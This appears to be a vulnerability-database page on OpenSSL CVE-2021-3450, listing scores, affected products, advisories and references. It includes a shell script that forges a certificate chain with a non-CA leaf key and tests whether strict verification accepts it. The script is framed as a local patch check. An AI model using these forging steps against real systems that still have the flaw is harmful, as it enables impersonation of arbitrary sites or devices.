
CVE-2021-3450

Published: 25/03/2021 Updated: 20/10/2021
CVSS v2 Base Score: 5.8 | Impact Score: 4.9 | Exploitability Score: 8.6
CVSS v3 Base Score: 7.4 | Impact Score: 5.2 | Exploitability Score: 2.2
CVSS v2 Vector: AV:N/AC:M/Au:N/C:P/I:P/A:N

Vulnerability Summary

On March 25, 2021, the OpenSSL Project released a security advisory, OpenSSL Security Advisory [25 March 2021], that disclosed two vulnerabilities. Exploitation of these vulnerabilities could allow a malicious user to use a valid non-certificate authority (CA) certificate to act as a CA and sign a certificate for an arbitrary organization, user or device, or to cause a denial of service (DoS) condition. Cisco's advisory will be updated as additional information becomes available and is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd
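The scenario in the summary (a valid non-CA certificate acting as an issuer) is easy to reproduce locally and makes a useful acceptance test for a patched build. The script below is an added example, not code from Vulmon, Cisco or the OpenSSL project. It builds a throwaway root CA, issues an ordinary end-entity certificate (basicConstraints CA:FALSE, no keyCertSign) from it, then uses that end-entity key to "issue" a certificate for an arbitrary name, and finally asks the local `openssl verify` to validate the result with `-x509_strict`. The work directory, file names and subject names are assumptions chosen for the example; only standard `openssl req`, `openssl x509` and `openssl verify` options are used.

```shell
#!/bin/sh
# Added example (not from Vulmon, Cisco or the OpenSSL project): reproduces
# the "non-CA certificate used as a CA" chain from the advisory summary and
# reports whether the local OpenSSL rejects it under -x509_strict.
# All file names, subjects and the work directory are assumptions.

# Write an extension file for "openssl x509 -extfile" (unnamed default
# section). $1 = output path, $2 = "ca" for the root, "ee" for end-entity.
write_ext() {
  if [ "$2" = "ca" ]; then
    printf '%s\n' \
      'subjectKeyIdentifier=hash' \
      'basicConstraints=critical,CA:TRUE' \
      'keyUsage=critical,keyCertSign,cRLSign' > "$1"
  else
    printf '%s\n' \
      'subjectKeyIdentifier=hash' \
      'authorityKeyIdentifier=keyid,issuer' \
      'basicConstraints=critical,CA:FALSE' \
      'keyUsage=critical,digitalSignature,keyEncipherment' > "$1"
  fi
}

# Create root.pem (CA), leaf.pem (non-CA, issued by root) and forged.pem
# (issued by leaf) in directory $1. Keys are throwaway test keys.
make_chain() {
  dir=$1
  write_ext "$dir/ca.ext" ca
  write_ext "$dir/ee.ext" ee

  # Self-signed root CA.
  openssl req -new -newkey rsa:2048 -nodes -subj '/CN=Example Test Root' \
    -keyout "$dir/root.key" -out "$dir/root.csr" >/dev/null 2>&1
  openssl x509 -req -in "$dir/root.csr" -signkey "$dir/root.key" -days 30 \
    -sha256 -extfile "$dir/ca.ext" -out "$dir/root.pem" >/dev/null 2>&1

  # Legitimate end-entity certificate issued by the root.
  openssl req -new -newkey rsa:2048 -nodes -subj '/CN=leaf.example.test' \
    -keyout "$dir/leaf.key" -out "$dir/leaf.csr" >/dev/null 2>&1
  openssl x509 -req -in "$dir/leaf.csr" -CA "$dir/root.pem" -CAkey "$dir/root.key" \
    -CAcreateserial -days 30 -sha256 -extfile "$dir/ee.ext" \
    -out "$dir/leaf.pem" >/dev/null 2>&1

  # The attack from the summary: the non-CA leaf signs a certificate for an
  # arbitrary name. Nothing stops the holder of leaf.key from doing this;
  # the verifier is what has to reject the result.
  openssl req -new -newkey rsa:2048 -nodes -subj '/CN=victim.example.test' \
    -keyout "$dir/forged.key" -out "$dir/forged.csr" >/dev/null 2>&1
  openssl x509 -req -in "$dir/forged.csr" -CA "$dir/leaf.pem" -CAkey "$dir/leaf.key" \
    -CAcreateserial -days 30 -sha256 -extfile "$dir/ee.ext" \
    -out "$dir/forged.pem" >/dev/null 2>&1
}

# Status 0 if leaf.pem chains to root.pem. It should: the leaf is a
# perfectly valid certificate, which is what makes the bypass dangerous.
leaf_verifies() {
  openssl verify -CAfile "$1/root.pem" "$1/leaf.pem" >/dev/null 2>&1
}

# Prints "fixed" when strict verification rejects forged.pem and
# "vulnerable" when it accepts a chain whose issuer is not a CA.
# -x509_strict with no -purpose is the configuration the OpenSSL advisory
# describes as affected on 1.1.1h through 1.1.1j; without the strict flag
# the chain is rejected on every version.
cve_2021_3450_verdict() {
  if openssl verify -x509_strict -CAfile "$1/root.pem" \
       -untrusted "$1/leaf.pem" "$1/forged.pem" >/dev/null 2>&1; then
    echo vulnerable
  else
    echo fixed
  fi
}

# Stand-alone run: build the chain in a temporary directory and report.
work=$(mktemp -d)
make_chain "$work"
leaf_verifies "$work" && echo "leaf.pem chains to root.pem as expected"
echo "openssl $(openssl version | cut -d' ' -f2): strict verify of forged chain -> $(cve_2021_3450_verdict "$work")"
rm -rf "$work"
```

On OpenSSL 1.1.1k or later (and on 3.x) the verdict is "fixed" and `openssl verify` reports the leaf as an invalid CA certificate. Two caveats from the OpenSSL advisory referenced below are worth keeping in mind when turning this into a fleet check: the bypass needs `X509_V_FLAG_X509_STRICT` to be set explicitly, and TLS clients and servers built on libssl set a verification purpose by default and are only affected if that purpose is overridden, so the exposed code is typically an application that drives the X509 verifier directly with the strict flag and no purpose.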


Vulnerable Products

openssl openssl
freebsd freebsd 12.2
netapp santricity_smi-s_provider_firmware
netapp storagegrid_firmware
windriver linux
windriver linux 17.0
windriver linux 18.0
windriver linux 19.0
netapp cloud volumes ontap mediator
netapp oncommand workflow automation
netapp ontap select deploy administration utility
netapp storagegrid
fedoraproject fedora 34
tenable nessus
tenable nessus agent
tenable nessus network monitor 5.11.0
tenable nessus network monitor 5.11.1
tenable nessus network monitor 5.12.0
tenable nessus network monitor 5.12.1
tenable nessus network monitor 5.13.0
oracle graalvm 19.3.5
oracle graalvm 20.3.1.2
oracle graalvm 21.0.0.2
oracle mysql server
oracle mysql workbench
oracle secure global desktop 5.6
mcafee web gateway 8.2.19
mcafee web gateway 9.2.10
mcafee web gateway 10.1.1
mcafee web gateway cloud service 8.2.19
mcafee web gateway cloud service 9.2.10
mcafee web gateway cloud service 10.1.1

Vendor Advisories

Security vulnerabilities have been disclosed on 25th March 2021 by the OpenSSL Project. OpenSSL is used by IBM Sterling Connect:Express for UNIX. IBM Sterling Connect:Express for UNIX has addressed the applicable CVE ...
A flaw was found in openssl. The flag that enables additional security checks of certificates present in a certificate chain was not enabled, allowing a confirmation step that verifies that certificates in the chain are valid CA certificates to be bypassed. The highest threat from this vulnerability is to data confidentiality and integrity ...
Arch Linux Security Advisory ASA-202103-10 ========================================== Severity: High Date : 2021-03-25 CVE-ID : CVE-2021-3449 CVE-2021-3450 Package : openssl Type : multiple issues Remote : Yes Link : security.archlinux.org/AVG-1736 Summary ======= The package openssl before version 1.1.1k-1 is vulnerable to m ...
The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the impleme ...
Nessus leverages third-party software to help provide underlying functionality. One of the third-party components (OpenSSL) was found to contain vulnerabilities, and updated versions have been made available by the providers. Out of caution and in line with good practice, Tenable opted to upgrade the bundled OpenSSL components to address the poten ...
On March 25, 2021, the OpenSSL Project released a security advisory, OpenSSL Security Advisory [25 March 2021], that disclosed two vulnerabilities. Exploitation of these vulnerabilities could allow an attacker to use a valid non-certificate authority (CA) certificate to act as a CA and sign a certificate for an arbitrary organization, user or devic ...
Multiple vulnerabilities have been found in Hitachi Ops Center Common Services: CVE-2021-3449, CVE-2021-3450, CVE-2021-23840, CVE-2021-23841. Affected products and versions are listed below. Please upgrade your version to the appropriate version ...
Nessus Network Monitor leverages third-party software to help provide underlying functionality. One of the third-party components (OpenSSL) was found to contain vulnerabilities, and updated versions have been made available by the providers. Out of caution and in line with good practice, Tenable opted to upgrade the bundled OpenSSL components to a ...
Multiple vulnerabilities have been found in Hitachi Ops Center Analyzer viewpoint: CVE-2020-1971, CVE-2021-3393, CVE-2021-3449, CVE-2021-3450, CVE-2021-23840, CVE-2021-23841. Affected products and versions are listed below. Please upgrade your version to the appropriate version ...
Multiple vulnerabilities in XStream, Java, OpenSSL, WebSphere Application Server Liberty and Node.js may affect IBM Spectrum Control. The Java vulnerabilities were disclosed as part of the IBM Java SDK updates in October 2020 and January 2021 ...

Mailing Lists

Hi, As many of you are aware, the OpenSSL project provides pre-notification of vulnerability disclosures. The way they do it is by posting to the public OpenSSL mailing lists (see "Forthcoming OpenSSL release" below) and by contacting specific other projects/channels with an offer to provide the actual detail more privately only to those interest ...

Github Repositories

Year of the Jellyfish (YotJF) Bradley, rnbochsr | 4/23/2021 - 4/30/2021. Target configuration info: Website IP changes each time the machine spins up. URL: robyns-petshop.thm. Website Platform: Amazon AWS, Version #? Web server: Apache 2.4.29 Ubuntu. Site runs using PicoCMS, Version #? OpenSSH 5.9p1 and 7.6p1. OpenSSL 1.1.1k. vsFTPd 3.0.3. Initi

Catlin Vulnerability Scanner. This can be used to scan vulnerability in Tekton Tasks. What is Trivy? Trivy (tri pronounced like trigger, vy pronounced like envy) is a simple and comprehensive vulnerability scanner for containers and other artifacts. A software vulnerability is a glitch, flaw, or weakness present in the software or in an Operating System. Trivy detects vulnerabi

TASSL-1.1.1k new version features: 1. Based on a modified open-source OpenSSL 1.1.1k. Compared with the previous TASSL based on OpenSSL 1.1.1b, the following vulnerabilities are fixed: CVE-2019-1543 CVE-2019-1552 CVE-2019-1563 CVE-2019-1547 CVE-2019-1549 CVE-2020-1967 CVE-2020-1971 CVE-2021-23840 CVE-2021-23839 CVE-2021-23841 CVE-2021-3449 CVE-2021-3450 CVE-2021-3711. 2. Supports RFC 8998 ShangMi (SM) Cipher Suites for TLS.

Recent Articles

OpenSSL shuts down two high-severity bugs: Flaws enable cert shenanigans, denial-of-service attacks
The Register • Thomas Claburn in San Francisco • 25 Mar 2021


Two high-severity vulnerabilities in the OpenSSL software library were disclosed on Thursday alongside the release of a patched version of the software, OpenSSL 1.1.1k.
OpenSSL is widely used to implement the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols, which support encrypted network connections. Alternatives include BoringSSL and LibreSSL, among others.
The first flaw, a certificate check bypass (CVE-2021-3450), arose as a result of code implemented in v...


OpenSSL fixes severe DoS, certificate validation vulnerabilities
BleepingComputer • Ax Sharma • 25 Mar 2021

Today, the OpenSSL project has issued an advisory for two high-severity vulnerabilities CVE-2021-3449 and CVE-2021-3450 lurking in OpenSSL products.
OpenSSL is a commonly used software library for building networking applications and servers that need to establish secure communications.
These flaws include:
The DoS vulnerability (CVE-2021-3449) in OpenSSL TLS server can cause the server to crash if during the course of renegotiation the client sends a malicious m...

References

CWE-295
https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b
https://www.openssl.org/news/secadv/20210325.txt
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd
https://security.netapp.com/advisory/ntap-20210326-0006/
https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc
http://www.openwall.com/lists/oss-security/2021/03/27/1
http://www.openwall.com/lists/oss-security/2021/03/27/2
http://www.openwall.com/lists/oss-security/2021/03/28/3
http://www.openwall.com/lists/oss-security/2021/03/28/4
https://security.gentoo.org/glsa/202103-03
https://www.tenable.com/security/tns-2021-05
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/
https://www.tenable.com/security/tns-2021-08
https://kc.mcafee.com/corporate/index?page=content&id=SB10356
https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html
https://www.tenable.com/security/tns-2021-09
https://www.oracle.com/security-alerts/cpuApr2021.html
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013
https://www.oracle.com//security-alerts/cpujul2021.html
https://www.oracle.com/security-alerts/cpuoct2021.html
https://nvd.nist.gov
https://www.ibm.com/blogs/psirt/security-bulletin-openssl-vulnerabilities-affect-ibm-sterling-connectexpress-for-unix-cve-2021-3449-cve-2021-3450/